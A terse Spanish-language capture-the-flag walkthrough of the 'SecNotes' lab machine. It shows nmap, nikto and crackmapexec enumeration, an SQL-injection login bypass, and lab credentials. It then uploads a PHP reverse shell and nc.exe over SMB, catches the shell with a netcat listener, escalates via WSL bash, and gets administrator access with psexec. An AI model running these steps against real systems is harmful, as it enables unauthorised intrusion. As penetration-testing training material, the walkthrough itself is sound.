nmap -A -p- -oA secnotes 10.129.178.250 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA secnotes 10.129.178.250

nmap -sU -O -p- -oA secnotes-udp 10.129.178.250

nikto -h 10.129.178.250:80

Pasted image 20211229081651.png

' or 1= '1

Pasted image 20211229082728.png

Le damos click a new site y vemos las credenciales de

tyler:92g!mA8BGjOirkL%OG*&

![[Pasted image 20211229083020.png]]

Trate de usar psexec para poder logearme pero no fue exitoso.

Pasted image 20210529164421.png

crackmapexec smb 10.129.178.250 -u 'tyler' -p '92g!mA8BGjOirkL%OG*&' --users

Pasted image 20211229083225.png

crackmapexec smb 10.129.178.250 -u 'tyler' -p '92g!mA8BGjOirkL%OG*&' --users

crackmapexec smb 10.129.178.250 -u 'tyler' -p '92g!mA8BGjOirkL%OG*&' --groups

crackmapexec smb 10.129.178.250 -u 'tyler' -p '92g!mA8BGjOirkL%OG*&' --shares

Pasted image 20211229084113.png

cat reverse.php

Pasted image 20211229094705.png

smbclient //secnotes.htb/new-site -U tyler

put reverse.php

put nc.exe

Pasted image 20211229085748.png

https://10.129.178.250:8080/reverse.php

nc -lvnp 443

Pasted image 20211229090439.png

Nos dirigimos a el desktop de tyler Y vemos un bash.lnk

Pasted image 20211229091002.png

type bash.lnk

Pasted image 20211229091137.png

#find files in windows looking for bash

where /R c:\windows bash.exe

Pasted image 20210529170307.png

Corremos el archivo de bash Y vemos que somos root

Pasted image 20211229092244.png

cat .bash_history

Pasted image 20211229092333.png

python3 /opt/impacket/examples/psexec.py secnotes.htb/administrator:'u6!4Zwgw0M#^0Bf#Nwnh'@10.129.178.250

Pasted image 20211229093933.png

boxes

copyright©2022 Cu3rv0x all rights reserved